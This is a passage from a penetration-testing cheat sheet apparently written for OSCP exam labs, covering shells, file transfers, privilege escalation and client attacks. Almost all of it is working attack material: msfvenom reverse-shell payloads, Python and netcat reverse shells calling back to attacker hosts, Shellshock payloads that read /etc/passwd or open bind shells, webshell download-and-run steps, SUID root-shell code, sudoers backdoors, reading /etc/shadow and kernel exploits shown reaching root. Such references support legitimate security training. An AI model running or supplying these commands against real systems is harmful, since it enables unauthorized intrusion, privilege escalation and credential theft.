905. - Create a PE Reverse Shell and Encode 9 times with

906. Shikata\_ga\_nai

907. msfvenom -p windows/shell\_reverse\_tcp LHOST=$ip LPORT=4444

908. -f
909. exe -e x86/shikata\_ga\_nai -i 9 -o

910. shell\_reverse\_msf\_encoded.exe
911.

912. - Create a PE reverse shell and embed it into an existing

913. executable
914. msfvenom -p windows/shell\_reverse\_tcp LHOST=$ip LPORT=4444 -f

915. exe -e x86/shikata\_ga\_nai -i 9 -x

916. /usr/share/windows-binaries/plink.exe -o

917. shell\_reverse\_msf\_encoded\_embedded.exe
918.

919. - Create a PE Reverse HTTPS shell

920. msfvenom -p windows/meterpreter/reverse\_https LHOST=$ip

921. LPORT=443 -f exe -o met\_https\_reverse.exe

922.
923. - Linux Buffer Overflows

924.

925. - Run Evans Debugger against an app

926. edb --run /usr/games/crossfire/bin/crossfire

927.
928. - ESP register points toward the end of our CBuffer

929. add eax,12

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
930. jmp eax
931. 83C00C add eax,byte +0xc

932. FFE0 jmp eax

933.

934. - Check for “Bad Characters” Process of elimination - Run multiple

935. times 0x00 - 0xFF

936.

937. - Find JMP ESP address

938. "\\x97\\x45\\x13\\x08" \# Found at Address 08134597

939.
940. - crash = "\\x41" \* 4368 + "\\x97\\x45\\x13\\x08" +

941. "\\x83\\xc0\\x0c\\xff\\xe0\\x90\\x90"

942.
943. - msfvenom -p linux/x86/shell\_bind\_tcp LPORT=4444 -f c -b

944. "\\x00\\x0a\\x0d\\x20" –e x86/shikata\_ga\_nai

945.

946. - Connect to the shell with netcat:

947. nc -v $ip 4444

948.

949. Shells
950. ===================================================================================================================================

951.
952. - Netcat Shell Listener

953.

954. `nc -nlvp 4444`

955.

956. - Spawning a TTY Shell - Break out of Jail or limited shell

957. You should almost always upgrade your shell after taking control of an apache or www user.

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
958.

959. (For example when you encounter an error message when trying to run an exploit sh: no job control in this shell )
960.

961. (hint: sudo -l to see what you can run)

962.

963. - You may encounter limited shells that use rbash and only allow you to execute a single command per session.

964. You can overcome this by executing an SSH shell to your localhost:
965.

966. ssh user@$ip nc $localip 4444 -e /bin/sh

967. enter user's password

968. python -c 'import pty; pty.spawn("/bin/sh")'

969. export TERM=linux

970.

971. `python -c 'import pty; pty.spawn("/bin/sh")'`

972.

973. python -c 'import socket,subprocess,os;s=socket.socket(socket.AF\_INET,socket.SOCK\_STREAM);

s.connect(("$ip",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(\["/bin/sh","-i"\]);'

974.

975. `echo os.system('/bin/bash')`

976.

977. `/bin/sh -i`

978.

979. `perl —e 'exec "/bin/sh";'`

980.
981. perl: `exec "/bin/sh";`

982.
983. ruby: `exec "/bin/sh"`

984.

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
985. lua: `os.execute('/bin/sh')`
986.

987. From within IRB: `exec "/bin/sh"`

988.

989.

990. From within vi: `:!bash`

991. or

992.
993. `:set shell=/bin/bash:shell`

994.

995. From within vim `':!bash':`

996.

997. From within nmap: `!sh`

998.

999. From within tcpdump

1000.

1001. echo $’id\\n/bin/netcat $ip 443 –e /bin/bash’ > /tmp/.test chmod +x /tmp/.test sudo tcpdump –ln –I eth- -w /dev/null –W 1 –G

1 –z /tmp/.tst –Z root
1002.

1003. From busybox `/bin/busybox telnetd -|/bin/sh -p9999`

1004.

1005. - Pen test monkey PHP reverse shell

1006. [http://pentestmonkey.net/tools/web-shells/php-reverse-shel](http://pentestmonkey.net/tools/web-shells/php-reverse-shell)
1007.

1008. - php-findsock-shell - turns PHP port 80 into an interactive shell

1009. [http://pentestmonkey.net/tools/web-shells/php-findsock-shell](http://pentestmonkey.net/tools/web-shells/php-findsock-shell)

1010.
1011. - Perl Reverse Shell

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
1012. [http://pentestmonkey.net/tools/web-shells/perl-reverse-shell](http://pentestmonkey.net/tools/web-shells/perl-reverse-shell)

1013.
1014. - PHP powered web browser Shell b374k with file upload etc.

1015. [https://github.com/b374k/b374k](https://github.com/b374k/b374k)

1016.
1017. - Windows reverse shell - PowerSploit’s Invoke-Shellcode script and inject a Meterpreter shell

1018. https://github.com/PowerShellMafia/PowerSploit/blob/master/CodeExecution/Invoke-Shellcode.ps1
1019.

1020. - Web Backdoors from Fuzzdb

1021. https://github.com/fuzzdb-project/fuzzdb/tree/master/web-backdoors

1022.

1023. - Creating Meterpreter Shells with MSFVenom - http://www.securityunlocked.com/2016/01/02/network-security-pentesting/most-useful-

msfvenom-payloads/

1024.
1025. *Linux*

1026.

1027. `msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf`
1028.

1029. *Windows*
1030.

1031. `msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe`
1032.

1033. *Mac*

1034.
1035. `msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho`

1036.
1037. **Web Payloads**

1038.

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
1039. *PHP*
1040.

1041. `msfvenom -p php/reverse_php LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php`
1042.

1043. OR

1044.
1045. `msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php`

1046.
1047. Then we need to add the <?php at the first line of the file so that it will execute as a PHP webpage:

1048.

1049. `cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php`
1050.

1051. *ASP*
1052.

1053. `msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp`

1054.
1055. *JSP*

1056.
1057. `msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp`

1058.
1059. *WAR*

1060.

1061. `msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war`
1062.

1063. Scripting Payloads

1064.

1065. *Python*

1066.

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
1067. `msfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py`

1068.
1069. *Bash*

1070.

1071. `msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.sh`
1072.

1073. *Perl*
1074.

1075. `msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl`

1076.
1077. **Shellcode**

1078.
1079. For all shellcode see ‘msfvenom –help-formats’ for information as to valid parameters. Msfvenom will output code that is able

to be cut and pasted in this language for your exploits.

1080.

1081. Linux Based Shellcode

1082.
1083. `msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>`

1084.
1085. *Windows Based Shellcode*

1086.

1087. `msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>`
1088.

1089. Mac Based Shellcode

1090.

1091. `msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>`
1092.

1093. **Handlers**

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
1094. Metasploit handlers can be great at quickly setting up Metasploit to be in a position to receive your incoming shells. Handlers
should be in the following format.

1095.

1096. use exploit/multi/handler

1097. set PAYLOAD <Payload name>

1098. set LHOST <LHOST value>

1099. set LPORT <LPORT value>

1100. set ExitOnSession false

1101. exploit -j -z

1102.

1103. Once the required values are completed the following command will execute your handler – ‘msfconsole -L -r ‘
1104.

1105. - SSH to Meterpreter: https://daemonchild.com/2015/08/10/got-ssh-creds-want-meterpreter-try-this/

1106.

1107. use auxiliary/scanner/ssh/ssh_login

1108. use post/multi/manage/shell_to_meterpreter

1109.

1110. - Shellshock
1111.

1112. - Testing for shell shock with NMap

1113.

1114. `root@kali:~/Documents# nmap -sV -p 80 --script http-shellshock --script-args uri=/cgi-bin/admin.cgi $ip`

1115.
1116. - git clone https://github.com/nccgroup/shocker

1117.
1118. `./shocker.py -H TARGET --command "/bin/cat /etc/passwd" -c /cgi-bin/status --verbose`

1119.

1120. - Shell Shock SSH Forced Command

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
1121. Check for forced command by enabling all debug output with ssh

1122.
1123. ssh -vvv

1124. ssh -i noob noob@$ip '() { :;}; /bin/bash'

1125.
1126. - cat file (view file contents)

1127.
1128. echo -e "HEAD /cgi-bin/status HTTP/1.1\\r\\nUser-Agent: () {:;}; echo

\\$(</etc/passwd)\\r\\nHost:vulnerable\\r\\nConnection: close\\r\\n\\r\\n" | nc TARGET 80

1129.
1130. - Shell Shock run bind shell

1131.
1132. echo -e "HEAD /cgi-bin/status HTTP/1.1\\r\\nUser-Agent: () {:;}; /usr/bin/nc -l -p 9999 -e

/bin/sh\\r\\nHost:vulnerable\\r\\nConnection: close\\r\\n\\r\\n" | nc TARGET 80

1133.

1134. File Transfers

1135. ============================================================================================================
1136.

1137. - Post exploitation refers to the actions performed by an attacker,

1138. once some level of control has been gained on his target.

1139.

1140. - Simple Local Web Servers

1141.

1142. - Run a basic http server, great for serving up shells etc
1143. python -m SimpleHTTPServer 80

1144.

1145. - Run a basic Python3 http server, great for serving up shells
1146. etc

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
1147. python3 -m http.server
1148.

1149. - Run a ruby webrick basic http server

1150. ruby -rwebrick -e "WEBrick::HTTPServer.new

1151. (:Port => 80, :DocumentRoot => Dir.pwd).start"

1152.
1153. - Run a basic PHP http server

1154. php -S $ip:80

1155.
1156. - Creating a wget VB Script on Windows:

1157. [*https://github.com/erik1o6/oscp/blob/master/wget-vbs-win.txt*](https://github.com/erik1o6/oscp/blob/master/wget-vbs-win.txt)
1158.

1159. - Windows file transfer script that can be pasted to the command line. File transfers to a Windows machine can be tricky without a
Meterpreter shell. The following script can be copied and pasted into a basic windows reverse and used to transfer files from a web

server (the timeout 1 commands are required after each new line):

1160.
1161. echo Set args = Wscript.Arguments >> webdl.vbs

1162. timeout 1
1163. echo Url = "http://1.1.1.1/windows-privesc-check2.exe" >> webdl.vbs

1164. timeout 1

1165. echo dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP") >> webdl.vbs

1166. timeout 1

1167. echo dim bStrm: Set bStrm = createobject("Adodb.Stream") >> webdl.vbs

1168. timeout 1

1169. echo xHttp.Open "GET", Url, False >> webdl.vbs

1170. timeout 1

1171. echo xHttp.Send >> webdl.vbs

1172. timeout 1

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
1173. echo with bStrm >> webdl.vbs

1174. timeout 1

1175. echo .type = 1 ' >> webdl.vbs

1176. timeout 1

1177. echo .open >> webdl.vbs

1178. timeout 1

1179. echo .write xHttp.responseBody >> webdl.vbs

1180. timeout 1

1181. echo .savetofile "C:\temp\windows-privesc-check2.exe", 2 ' >> webdl.vbs

1182. timeout 1
1183. echo end with >> webdl.vbs

1184. timeout 1
1185. echo

1186.

1187. The file can be run using the following syntax:

1188.

1189. `C:\temp\cscript.exe webdl.vbs`

1190.

1191. - Mounting File Shares

1192.

1193. - Mount NFS share to /mnt/nfs

1194. mount $ip:/vol/share /mnt/nfs

1195.

1196. - HTTP Put

1197. nmap -p80 $ip --script http-put --script-args

1198. http-put.url='/test/sicpwn.php',http-put.file='/var/www/html/sicpwn.php

1199.
1200. - Uploading Files

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
1201. -------------------------------------------------------------------------------------------------------------
1202.

1203. - SCP

1204.
1205. scp username1@source_host:directory1/filename1 username2@destination_host:directory2/filename2

1206.
1207. scp localfile username@$ip:~/Folder/

1208.

1209. scp Linux_Exploit_Suggester.pl bob@192.168.1.10:~

1210.

1211.
1212. - Webdav with Davtest- Some sysadmins are kind enough to enable the PUT method - This tool will auto upload a backdoor

1213.
1214. `davtest -move -sendbd auto -url http://$ip`

1215.

1216. https://github.com/cldrn/davtest
1217.

1218. You can also upload a file using the PUT method with the curl command:
1219.

1220. `curl -T 'leetshellz.txt' 'http://$ip'`

1221.
1222. And rename it to an executable file using the MOVE method with the curl command:

1223.
1224. `curl -X MOVE --header 'Destination:http://$ip/leetshellz.php' 'http://$ip/leetshellz.txt'`

1225.

1226. - Upload shell using limited php shell cmd

1227. use the webshell to download and execute the meterpreter

1228. \[curl -s --data "cmd=wget http://174.0.42.42:8000/dhn -O

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
1229. /tmp/evil" http://$ip/files/sh.php

1230. \[curl -s --data "cmd=chmod 777 /tmp/evil"

1231. http://$ip/files/sh.php
1232. curl -s --data "cmd=bash -c /tmp/evil" http://$ip/files/sh.php

1233.
1234. - TFTP

1235. mkdir /tftp

1236. atftpd --daemon --port 69 /tftp

1237. cp /usr/share/windows-binaries/nc.exe /tftp/

1238. EX. FROM WINDOWS HOST:

1239. C:\\Users\\Offsec>tftp -i $ip get nc.exe

1240.
1241. - FTP

1242. apt-get update && apt-get install pure-ftpd

1243.
1244. \#!/bin/bash

1245. groupadd ftpgroup

1246. useradd -g ftpgroup -d /dev/null -s /etc ftpuser

1247. pure-pw useradd offsec -u ftpuser -d /ftphome

1248. pure-pw mkdb

1249. cd /etc/pure-ftpd/auth/

1250. ln -s ../conf/PureDB 60pdb

1251. mkdir -p /ftphome

1252. chown -R ftpuser:ftpgroup /ftphome/

1253.

1254. /etc/init.d/pure-ftpd restart

1255.
1256. - Packing Files

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
1257. -------------------------------------------------------------------------------------------------------------

1258.
1259. - Ultimate Packer for eXecutables

1260. upx -9 nc.exe

1261.

1262. - exe2bat - Converts EXE to a text file that can be copied and
1263. pasted

1264. locate exe2bat

1265. wine exe2bat.exe nc.exe nc.txt

1266.

1267. - Veil - Evasion Framework -

1268. https://github.com/Veil-Framework/Veil-Evasion

1269. apt-get -y install git

1270. git clone https://github.com/Veil-Framework/Veil-Evasion.git

1271. cd Veil-Evasion/

1272. cd setup
1273. setup.sh -c

1274.
1275. Privilege Escalation

1276. ==================================================================================================================

1277.
1278. *Password reuse is your friend. The OSCP labs are true to life, in the way that the users will reuse passwords across different

services and even different boxes. Maintain a list of cracked passwords and test them on new machines you encounter.*
1279.

1280.

1281. - Linux Privilege Escalation

1282. ------------------------------------------------------------------------------------------------------------------------

1283.

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
1284. - Defacto Linux Privilege Escalation Guide - A much more through guide for linux enumeration:

1285. [https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-

escalation/)
1286.

1287. - Try the obvious - Maybe the user can sudo to root:
1288.

1289. `sudo su`

1290.
1291. - Here are the commands I have learned to use to perform linux enumeration and privledge escalation:

1292.
1293. What services are running as root?:

1294.
1295. `ps aux | grep root`

1296.

1297. What files run as root / SUID / GUID?:

1298.

1299. find / -perm +2000 -user root -type f -print

1300. find / -perm -1000 -type d 2>/dev/null # Sticky bit - Only the owner of the directory or the owner of a file can delete or

rename here.

1301. find / -perm -g=s -type f 2>/dev/null # SGID (chmod 2000) - run as the group, not the user who started it.
1302. find / -perm -u=s -type f 2>/dev/null # SUID (chmod 4000) - run as the owner, not the user who started it.

1303. find / -perm -g=s -o -perm -u=s -type f 2>/dev/null # SGID or SUID
1304. for i in `locate -r "bin$"`; do find $i $ -perm -4000 -o -perm -2000 $ -type f 2>/dev/null; done

1305. find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} \; 2>/dev/null

1306.
1307. What folders are world writeable?:

1308.
1309. find / -writable -type d 2>/dev/null # world-writeable folders

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
1310. find / -perm -222 -type d 2>/dev/null # world-writeable folders

1311. find / -perm -o w -type d 2>/dev/null # world-writeable folders

1312. find / -perm -o x -type d 2>/dev/null # world-executable folders

1313. find / $ -perm -o w -perm -o x $ -type d 2>/dev/null # world-writeable & executable folders
1314.

1315. - There are a few scripts that can automate the linux enumeration process:

1316.
1317. - Google is my favorite Linux Kernel exploitation search tool. Many of these automated checkers are missing important kernel

exploits which can create a very frustrating blindspot during your OSCP course.
1318.

1319. - LinuxPrivChecker.py - My favorite automated linux priv enumeration checker -

1320.

1321. [https://www.securitysift.com/download/linuxprivchecker.py](https://www.securitysift.com/download/linuxprivchecker.py)

1322.
1323. - LinEnum - (Recently Updated)

1324.
1325. [https://github.com/rebootuser/LinEnum](https://github.com/rebootuser/LinEnum)

1326.

1327. - linux-exploit-suggester (Recently Updated)

1328.

1329. [https://github.com/mzet-/linux-exploit-suggester](https://github.com/mzet-/linux-exploit-suggester)
1330.

1331. - Highon.coffee Linux Local Enum - Great enumeration script!

1332.

1333. `wget https://highon.coffee/downloads/linux-local-enum.sh`

1334.
1335. - Linux Privilege Exploit Suggester (Old has not been updated in years)

1336.

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
1337. [https://github.com/PenturaLabs/Linux\_Exploit\_Suggester](https://github.com/PenturaLabs/Linux_Exploit_Suggester)
1338.

1339. - Linux post exploitation enumeration and exploit checking tools

1340.

1341. [https://github.com/reider-roque/linpostexp](https://github.com/reider-roque/linpostexp)
1342.

1343.

1344. Handy Kernel Exploits

1345.

1346. - CVE-2010-2959 - 'CAN BCM' Privilege Escalation - Linux Kernel < 2.6.36-rc1 (Ubuntu 10.04 / 2.6.32)
1347.

1348. [https://www.exploit-db.com/exploits/14814/](https://www.exploit-db.com/exploits/14814/)

1349.
1350. wget -O i-can-haz-modharden.c http://www.exploit-db.com/download/14814

1351. $ gcc i-can-haz-modharden.c -o i-can-haz-modharden

1352. $ ./i-can-haz-modharden

1353. [+] launching root shell!

1354. # id

1355. uid=0(root) gid=0(root)

1356.
1357. - CVE-2010-3904 - Linux RDS Exploit - Linux Kernel <= 2.6.36-rc8

1358. [https://www.exploit-db.com/exploits/15285/](https://www.exploit-db.com/exploits/15285/)
1359.

1360. - CVE-2012-0056 - Mempodipper - Linux Kernel 2.6.39 < 3.2.2 (Gentoo / Ubuntu x86/x64)

1361. [https://git.zx2c4.com/CVE-2012-0056/about/](https://git.zx2c4.com/CVE-2012-0056/about/)
1362. Linux CVE 2012-0056

1363.
1364. wget -O exploit.c http://www.exploit-db.com/download/18411

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
1365. gcc -o mempodipper exploit.c

1366. ./mempodipper
1367.

1368. - CVE-2016-5195 - Dirty Cow - Linux Privilege Escalation - Linux Kernel <= 3.19.0-73.8
1369. [https://dirtycow.ninja/](https://dirtycow.ninja/)

1370. First existed on 2.6.22 (released in 2007) and was fixed on Oct 18, 2016

1371.
1372. - Run a command as a user other than root

1373.
1374. sudo -u haxzor /usr/bin/vim /etc/apache2/sites-available/000-default.conf

1375.
1376. - Add a user or change a password

1377.

1378. /usr/sbin/useradd -p 'openssl passwd -1 thePassword' haxzor

1379. echo thePassword | passwd haxzor --stdin

1380.
1381. - Local Privilege Escalation Exploit in Linux

1382.

1383. - SUID (Set owner User ID up on execution)

1384. Often SUID C binary files are required to spawn a shell as a

1385. superuser, you can update the UID / GID and shell as required.
1386.

1387. below are some quick copy and paste examples for various

1388. shells:
1389.

1390. SUID C Shell for /bin/bash

1391.

1392. int main(void){

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
1393. setresuid(0, 0, 0);
1394. system("/bin/bash");

1395. }
1396.

1397. SUID C Shell for /bin/sh

1398.

1399. int main(void){

1400. setresuid(0, 0, 0);

1401. system("/bin/sh");

1402. }
1403.

1404. Building the SUID Shell binary

1405. gcc -o suid suid.c

1406. For 32 bit:

1407. gcc -m32 -o suid suid.c

1408.

1409. - Create and compile an SUID from a limited shell (no file transfer)

1410.
1411. echo "int main(void){\nsetgid(0);\nsetuid(0);\nsystem(\"/bin/sh\");\n}" >privsc.c

1412. gcc privsc.c -o privsc

1413.

1414. - Handy command if you can get a root user to run it. Add the www-data user to Root SUDO group with no password requirement:
1415.

1416. `echo 'chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD:ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /tmp/update`

1417.
1418. - You may find a command is being executed by the root user, you may be able to modify the system PATH environment variable

1419. to execute your command instead. In the example below, ssh is replaced with a reverse shell SUID connecting to 10.10.10.1 on
1420. port 4444.

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
1421.

1422. set PATH="/tmp:/usr/local/bin:/usr/bin:/bin"

1423. echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.1 4444 >/tmp/f" >> /tmp/ssh

1424. chmod +x ssh

1425.

1426. - SearchSploit

1427.
1428. searchsploit –uncsearchsploit apache 2.2

1429. searchsploit "Linux Kernel"

1430. searchsploit linux 2.6 | grep -i ubuntu | grep local

1431. searchsploit slmail

1432.
1433. - Kernel Exploit Suggestions for Kernel Version 3.0.0

1434.
1435. `./usr/share/linux-exploit-suggester/Linux_Exploit_Suggester.pl -k 3.0.0`

1436.
1437. - Precompiled Linux Kernel Exploits - ***Super handy if GCC is not installed on the target machine!***

1438.

1439. [*https://www.kernel-exploits.com/*](https://www.kernel-exploits.com/)
1440.

1441. - Collect root password

1442.

1443. `cat /etc/shadow |grep root`

1444.
1445. - Find and display the proof.txt or flag.txt - LOOT!

1446.
1447. cat `find / -name proof.txt -print`

1448.

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
1449. - Windows Privilege Escalation
1450. --------------------------------------------------------------------------------------------------------------------------

1451.
1452. - Windows Privilege Escalation resource

1453. http://www.fuzzysecurity.com/tutorials/16.html

1454.
1455. - Try the getsystem command using meterpreter - rarely works but is worth a try.

1456.
1457. `meterpreter > getsystem`

1458.
1459. - Metasploit Meterpreter Privilege Escalation Guide

1460. https://www.offensive-security.com/metasploit-unleashed/privilege-escalation/

1461.
1462. - Windows Server 2003 and IIS 6.0 WEBDAV Exploiting

1463. http://www.r00tsec.com/2011/09/exploiting-microsoft-iis-version-60.html
1464.

1465. msfvenom -p windows/meterpreter/reverse_tcp LHOST=1.2.3.4 LPORT=443 -f asp > aspshell.txt

1466.
1467. cadavar http://$ip

1468. dav:/> put aspshell.txt

1469. Uploading aspshell.txt to `/aspshell.txt':

1470. Progress: [=============================>] 100.0% of 38468 bytes succeeded.

1471. dav:/> copy aspshell.txt aspshell3.asp;.txt

1472. Copying `/aspshell3.txt' to `/aspshell3.asp%3b.txt': succeeded.

1473. dav:/> exit

1474.

1475. msf > use exploit/multi/handler

1476. msf exploit(handler) > set payload windows/meterpreter/reverse_tcp

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
1477. msf exploit(handler) > set LHOST 1.2.3.4

1478. msf exploit(handler) > set LPORT 80

1479. msf exploit(handler) > set ExitOnSession false

1480. msf exploit(handler) > exploit -j

1481.

1482. curl http://$ip/aspshell3.asp;.txt

1483.
1484. [*] Started reverse TCP handler on 1.2.3.4:443

1485. [*] Starting the payload handler...

1486. [*] Sending stage (957487 bytes) to 1.2.3.5

1487. [*] Meterpreter session 1 opened (1.2.3.4:443 -> 1.2.3.5:1063) at 2017-09-25 13:10:55 -0700

1488.
1489. - Windows privledge escalation exploits are often written in Python. So, it is necessary to compile the using pyinstaller.py into

an executable and upload them to the remote server.

1490.

1491. pip install pyinstaller

1492. wget -O exploit.py http://www.exploit-db.com/download/31853

1493. python pyinstaller.py --onefile exploit.py

1494.
1495. - Windows Server 2003 and IIS 6.0 privledge escalation using impersonation:

1496.
1497. https://www.exploit-db.com/exploits/6705/

1498.

1499. https://github.com/Re4son/Churrasco
1500.

1501. c:\Inetpub>churrasco
1502. churrasco

1503. /churrasco/-->Usage: Churrasco.exe [-d] "command to run"

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
1504.
1505. c:\Inetpub>churrasco -d "net user /add <username> <password>"

1506. c:\Inetpub>churrasco -d "net localgroup administrators <username> /add"

1507. c:\Inetpub>churrasco -d "NET LOCALGROUP "Remote Desktop Users" <username> /ADD"

1508.

1509. - Windows MS11-080 - http://www.exploit-db.com/exploits/18176/

1510.

1511. python pyinstaller.py --onefile ms11-080.py

1512. mx11-080.exe -O XP

1513.

1514. - Powershell Exploits - You may find that some Windows privledge escalation exploits are written in Powershell. You may not have an
interactive shell that allows you to enter the powershell prompt. Once the powershell script is uploaded to the server, here is a

quick one liner to run a powershell command from a basic (cmd.exe) shell:
1515.

1516. MS16-032 https://www.exploit-db.com/exploits/39719/

1517.

1518. `powershell -ExecutionPolicy ByPass -command "& { . C:\Users\Public\Invoke-MS16-032.ps1; Invoke-MS16-032 }"`

1519.
1520.

1521. - Powershell Priv Escalation Tools

1522. https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc

1523.

1524. - Windows Run As - Switching users in linux is trival with the `SU` command. However, an equivalent command does not exist in
Windows. Here are 3 ways to run a command as a different user in Windows.

1525.
1526. - Sysinternals psexec is a handy tool for running a command on a remote or local server as a specific user, given you have

thier username and password. The following example creates a reverse shell from a windows server to our Kali box using netcat for

Windows and Psexec (on a 64 bit system).

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
1527.

1528. C:\>psexec64 \\COMPUTERNAME -u Test -p test -h "c:\users\public\nc.exe -nc 192.168.1.10 4444 -e cmd.exe"
1529.

1530. PsExec v2.2 - Execute processes remotely

1531. Copyright (C) 2001-2016 Mark Russinovich

1532. Sysinternals - www.sysinternals.com

1533.
1534. - Runas.exe is a handy windows tool that allows you to run a program as another user so long as you know thier password. The

following example creates a reverse shell from a windows server to our Kali box using netcat for Windows and Runas.exe:
1535.

1536. C:\>C:\Windows\System32\runas.exe /env /noprofile /user:Test "c:\users\public\nc.exe -nc 192.168.1.10 4444 -e cmd.exe"

1537. Enter the password for Test:

1538. Attempting to start nc.exe as user "COMPUTERNAME\Test" ...

1539.
1540. - PowerShell can also be used to launch a process as another user. The following simple powershell script will run a reverse

shell as the specified username and password.

1541.
1542. $username = '<username here>'

1543. $password = '<password here>'

1544. $securePassword = ConvertTo-SecureString $password -AsPlainText -Force

1545. $credential = New-Object System.Management.Automation.PSCredential $username, $securePassword

1546. Start-Process -FilePath C:\Users\Public\nc.exe -NoNewWindow -Credential $credential -ArgumentList ("-

nc","192.168.1.10","4444","-e","cmd.exe") -WorkingDirectory C:\Users\Public

1547.
1548. Next run this script using powershell.exe:

1549.
1550. `powershell -ExecutionPolicy ByPass -command "& { . C:\Users\public\PowerShellRunAs.ps1; }"`

1551.

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
1552.
1553. - Windows Service Configuration Viewer - Check for misconfigurations

1554. in services that can lead to privilege escalation. You can replace
1555. the executable with your own and have windows execute whatever code

1556. you want as the privileged user.

1557. icacls scsiaccess.exe

1558.

1559. scsiaccess.exe
1560. NT AUTHORITY\SYSTEM:(I)(F)

1561. BUILTIN\Administrators:(I)(F)

1562. BUILTIN\Users:(I)(RX)
1563. APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)

1564. Everyone:(I)(F)
1565.

1566. - Compile a custom add user command in windows using C

1567.
1568. root@kali:~\# cat useradd.c

1569. #include <stdlib.h> /* system, NULL, EXIT_FAILURE */

1570. int main ()

1571. {
1572. int i;

1573. i=system ("net localgroup administrators low /add");

1574. return 0;
1575. }

1576.
1577. i686-w64-mingw32-gcc -o scsiaccess.exe useradd.c

1578.

1579. - Group Policy Preferences (GPP)

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
1580. A common useful misconfiguration found in modern domain environments

1581. is unprotected Windows GPP settings files

1582.

1583. - map the Domain controller SYSVOL share

1584.
1585. `net use z:\\dc01\SYSVOL`

1586.
1587. - Find the GPP file: Groups.xml

1588.

1589. `dir /s Groups.xml`

1590.

1591. - Review the contents for passwords

1592.

1593. `type Groups.xml`

1594.

1595. - Decrypt using GPP Decrypt

1596.
1597. `gpp-decrypt riBZpPtHOGtVk+SdLOmJ6xiNgFH6Gp45BoP3I6AnPgZ1IfxtgI67qqZfgh78kBZB`

1598.
1599. - Find and display the proof.txt or flag.txt - get the loot!

1600.

1601. `#meterpreter > run post/windows/gather/win_privs`

1602. `cd\ & dir /b /s proof.txt`

1603. `type c:\pathto\proof.txt`

1604.

1605.

1606. Client, Web and Password Attacks

1607. ==============================================================================================================================

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
1608.
1609. - Client Attacks

1610. ------------------------------------------------------------------------------------------------------------

1611.
1612. - MS12-037- Internet Explorer 8 Fixed Col Span ID

1613. wget -O exploit.html

1614. <http://www.exploit-db.com/download/24017>

1615. service apache2 start

1616.

1617. - JAVA Signed Jar client side attack

1618. echo '<applet width="1" height="1" id="Java Secure"

1619. code="Java.class" archive="SignedJava.jar"><param name="1"

1620. value="http://$ip:80/evil.exe"></applet>' >

1621. /var/www/html/java.html

1622. User must hit run on the popup that occurs.

1623.
1624. - Linux Client Shells

1625. [*http://www.lanmaster53.com/2011/05/7-linux-shells-using-built-in-tools/*](http://www.lanmaster53.com/2011/05/7-linux-
shells-using-built-in-tools/)

1626.

